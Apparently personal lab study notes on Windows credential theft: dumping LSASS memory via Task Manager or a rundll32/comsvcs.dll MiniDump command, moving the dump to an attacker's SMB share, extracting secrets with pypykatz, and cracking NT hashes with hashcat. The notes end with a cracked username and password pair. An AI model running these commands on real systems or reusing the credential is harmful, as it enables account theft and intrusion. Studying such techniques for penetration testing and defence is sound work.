- LSASS is a core Windows process responsible for enforcing security policies, handling user authentication, and storing sensitive credential material in memory. - **LSASS stores credentials that have active logon session on Windows systems.** - When we dumped LSASS process memory into the file, we essentially took a “snapshot” of what was in memory at that point in time. - If there were any active logon sessions, the credentials used to establish them will be present. - Upon initial logon, LSASS will: - cache credentials locally in memory - create access tokens - enforce security policies - write to Windows’ security log # Dumping LSASS process memory ### Task Manager method 1. Open `Task Manager` 2. Select the `Processes` tab 3. Find and right click the `Local Security Authority Process` 4. Select `Create dump file` 5. A file called `lsass.DMP` is created and saved in `%temp%` 1. This is the file we will transfer to our attack host. ![[Pasted image 20250701232519.png]] ### Rundll32.exe & Comsvcs.dll method ```bash # determine what PID is assigned to lsass.exe from CMD tasklist /svc # determine what PID is assigned to lsass.exe from PowerShell Get-Process lsass # With an elevated PS session, we can create a dump file # 672 is the PID of lsass.exe in this case rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full ``` ### Transfer `.dmp` from target host to attack host ```bash # attack host sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support share /home/wook/Desktop # target host move lsass.DMP \\\\<attack_host_IP>\\share ``` ### Using Pypykatz to extract credentials (extract from `.dmp` files) - an implementation of Mimikatz written entirely in Python. → allows us to run it on Linux - Mimikatz → only available in Windows ```bash pypykatz lsa minidump /home/wook/Documents/lsass.dmp ``` ### Crack the NT Hash with Hashcat ```bash hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt ``` vfrank:Imply wet Unmasked!